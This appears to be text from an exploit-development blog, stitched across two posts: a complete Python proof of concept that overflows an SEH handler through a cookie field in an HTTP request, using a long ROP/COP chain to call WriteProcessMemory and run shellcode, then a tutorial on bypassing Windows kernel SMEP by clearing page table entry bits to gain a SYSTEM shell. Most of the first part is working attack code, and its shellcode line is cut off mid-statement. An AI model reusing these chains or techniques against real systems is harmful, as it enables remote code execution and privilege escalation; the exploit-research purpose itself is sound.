crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!VirtualParameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS


Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00


Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register - or completely circumventing SMEP all together by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DEF CON 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s β€œmodern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage for the title of this section, comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some psuedo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect


# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8


# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above psuedo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode), get’s written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

β€œAny page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the their statement in Alex’s talk, is that only ONE of the paging structure table entries (a page table entry) is needed to be set to kernel, in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint - as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D - The β€œdirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A - The β€œaccess” bit has been set, meaning this address has been referenced at some point.
  3. U - The β€œuser” bit has been set here. When the memory manager unit reads in this address, it recognizes is as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W - The β€œwrite” bit has been set here, meaning this memory page is writable.
  5. E - The β€œexecutable” bit has been set here, meaning this memory page is executable.
  6. V - The β€œvalid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the psuedo code snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t β€œdisable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said β€œtreat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has an API for just about anything! Fetching the PTE for an associated virtual address is no different. Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important - as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but it is not much of a use to be honest if the attacker already has an abitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft - I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

